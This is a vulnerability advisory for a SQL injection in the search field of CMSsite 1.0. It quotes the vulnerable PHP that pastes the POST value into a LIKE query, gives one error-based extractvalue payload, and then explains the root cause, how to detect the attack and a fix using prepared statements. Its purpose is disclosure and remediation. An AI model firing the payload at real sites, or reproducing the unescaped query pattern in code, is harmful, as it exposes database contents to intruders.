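# Exploit Title: CMSsite 1.0 - 'search' SQL injection
# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
# Date: 2019-01-27
# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A
# ===============================================
# vulnerable file: search.php
# vulnerable parameter : POST - search
#
# Code as reported in search.php (vulnerable; kept as a reference excerpt):
#
#   if (isset($_POST['submit'])) {
#       $search = $_POST["search"];
#   }
#   $query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND post_status='publish'";
#   $search_query = mysqli_query($con, $query);
#
# payload on search text box: ' and extractvalue(1,concat(':',database(),':'))#
# ===============================================
#
# Root cause: the POST field `search` is interpolated into the SQL text inside a
# single-quoted LIKE literal with no escaping and no parameter binding, so a quote
# character in the field ends the literal and the rest of the field is parsed as SQL.
# In the reported code $search is also left undefined when `submit` is absent.
#
# NOTE(review): the payload above returns data through a database error message, so
# search.php (or the PHP configuration) presumably exposes MySQL error text in the
# response. That part is not visible in this excerpt; confirm, and keep database
# errors out of user-facing output.
#
# Detection: POST requests to search.php whose `search` field contains quote
# characters or SQL function names are worth alerting on in web/WAF logs.
#
# Remediated form of the same excerpt. It keeps the variable names ($search, $query,
# $search_query) so the rest of search.php can keep consuming $search_query as a
# mysqli_result (or false on failure), as it did with mysqli_query().

# Always define $search; accept the field only when it is a plain string
# (an array-valued `search[]` field would otherwise be stringified as "Array").
$search = '';
if (isset($_POST['submit'], $_POST['search']) && is_string($_POST['search'])) {
    $search = $_POST['search'];
}

# Build the LIKE pattern in PHP. '!' is declared as the LIKE escape character in the
# query below, so user-typed '%' and '_' are matched literally instead of acting as
# wildcards. An explicit ESCAPE clause avoids depending on the server's
# backslash-escape SQL mode.
$pattern = '%' . strtr($search, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';

# The user-controlled value is sent as a bound parameter, never as part of the SQL text.
$query = "SELECT * FROM posts WHERE post_tags LIKE ? ESCAPE '!' AND post_status='publish'";

$search_query = false;
$stmt = mysqli_prepare($con, $query);
if ($stmt !== false) {
    mysqli_stmt_bind_param($stmt, 's', $pattern);
    if (mysqli_stmt_execute($stmt)) {
        # Requires the mysqlnd driver; yields the same mysqli_result type that
        # mysqli_query() returned in the original code.
        $search_query = mysqli_stmt_get_result($stmt);
    }
}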